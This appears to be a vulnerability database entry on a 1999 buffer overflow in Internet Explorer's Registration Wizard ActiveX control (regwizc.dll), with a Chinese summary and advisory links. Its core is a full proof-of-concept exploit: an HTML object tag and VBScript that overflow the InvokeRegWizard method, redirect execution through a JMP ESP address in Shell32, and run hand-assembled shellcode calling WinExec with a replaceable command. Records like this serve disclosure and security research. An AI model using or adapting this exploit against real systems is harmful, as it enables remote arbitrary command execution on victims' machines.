https://www.exploit-db.com/exploits/19528
https://www.securityfocus.com/bid/87944
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-199909-020

Kodak/Wang(1)影像编辑(imgedit.ocx)，(2)影像注解(imgedit.ocx)，(3)影像扫描(imgscan.ocx)，(4)缩略图(imgthumb.ocx)，(5)图像管理(imgadmin.ocx)，(6)HHOpen(hhopen.ocx)，(7)注册向导(regwizc.dll)，以及(8)InternetExplorer(IE)4.01和5.0版本上的IEActiveSetup(setupctl.dll)ActiveX控件被标记为“SafeforScripting，”。远程攻击者可以创建和修改文件以及执行任意命令。

Microsoft Internet Explorer 4.1/5.0 for Windows 95/Windows NT 4,Windows 98 Registration Wizard Buffer Overflow Vulnerability

source: http://www.securityfocus.com/bid/671/info


There is a buffer overflow in the Internet Explorer Registration Wizard control (regwizc.dll). This control is marked 'Safe for Scripting' . Arbitrary commands may be executed if the control is run in a malicious manner. 

REGWIZC

The Registration Wizard control used by Microsoft to 
register MS products also contains a buffer overrun in 
the 'InvokeRegWizard' method. When called with a long 
string, pre-pended with '/i', we can gain control of the 
RET address and exploit the control in a similar manner as 
the PDF control. This exploit will cause a 'Regwiz.log' 
file to be created in the temporary directory, and once 
again will execute CALC.EXE and terminate the host.

<object classid="clsid:50E5E3D1-C07E-11D0-B9FD-
00A0249F6B00" id="RegWizObj">
</object>

<script language="VbScript" ><!--

msgbox("Registration Wizard Buffer Overrun" + Chr(10) 
+ "Written by Shane Hird")

expstr = "/i 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"

'We overflowed to the RET point of the stack
'No NULL's allowed so ret to <JMP ESP> in Shell32

expstr = expstr & Chr(235)	'Address in SHELL32, Win98 
(7FD035EB) of JMP ESP
expstr = expstr & Chr(53)	'You may need to use a 
different address
expstr = expstr & Chr(208)
expstr = expstr & Chr(127)


'NOP for debugging purposes
expstr = expstr + Chr(144)

'MOV EDI, ESP
expstr = expstr + Chr(139) + Chr(252)

'ADD EDI, 19 (Size of code)
expstr = expstr + Chr(131) + Chr(199) + Chr(25)

'PUSH EAX (Window Style EAX = 41414141)
expstr = expstr + Chr(80)

'PUSH EDI (Address of command line)
expstr = expstr + Chr(87)

'MOV EDX, BFFA0960 (WinExec, Win98)
expstr = expstr + Chr(186) + Chr(96) + Chr(9) + Chr(250) + 
Chr(191)

'CALL EDX
expstr = expstr + Chr(255) + Chr(210)

'XOR EAX, EAX
expstr = expstr + Chr(51) + Chr(192)

'PUSH EAX
expstr = expstr + Chr(80)

'MOV EDX, BFF8D4CA (ExitProcess, Win98)
expstr = expstr + Chr(186) + Chr(202) + Chr(212) + Chr(248) 
+ Chr(191)

'CALL EDX
expstr = expstr + Chr(255) + Chr(210)

'Replace with any command + 0 (automatically appended)
expstr = expstr + "CALC.EXE"

RegWizObj.InvokeRegWizard(expstr)

--></script>

Microsoft Internet Explorer 4.0.1

来源:US-CERTVulnerabilityNote:VU#9162
名称:VU#9162
链接:http://www.kb.cert.org/vuls/id/9162
来源:US-CERTVulnerabilityNote:VU#41408
名称:VU#41408
链接:http://www.kb.cert.org/vuls/id/41408
来源:US-CERTVulnerabilityNote:VU#26924
名称:VU#26924
链接:http://www.kb.cert.org/vuls/id/26924
来源:US-CERTVulnerabilityNote:VU#24839
名称:VU#24839
链接:http://www.kb.cert.org/vuls/id/24839
来源:US-CERTVulnerabilityNote:VU#23412
名称:VU#23412
链接:http://www.kb.cert.org/vuls/id/23412
来源:XF
名称:wang-kodak-activex-control(7097)
链接:http://xforce.iss.net/xforce/xfdb/7097
来源:BUGTRAQ
名称:19990924SeveralActiveXBufferOverruns
链接:http://www.securityfocus.com/archive/1/28719
来源:MS
名称:MS99-037
链接:http://www.microsoft.com/technet/security/bulletin/ms99-037.mspx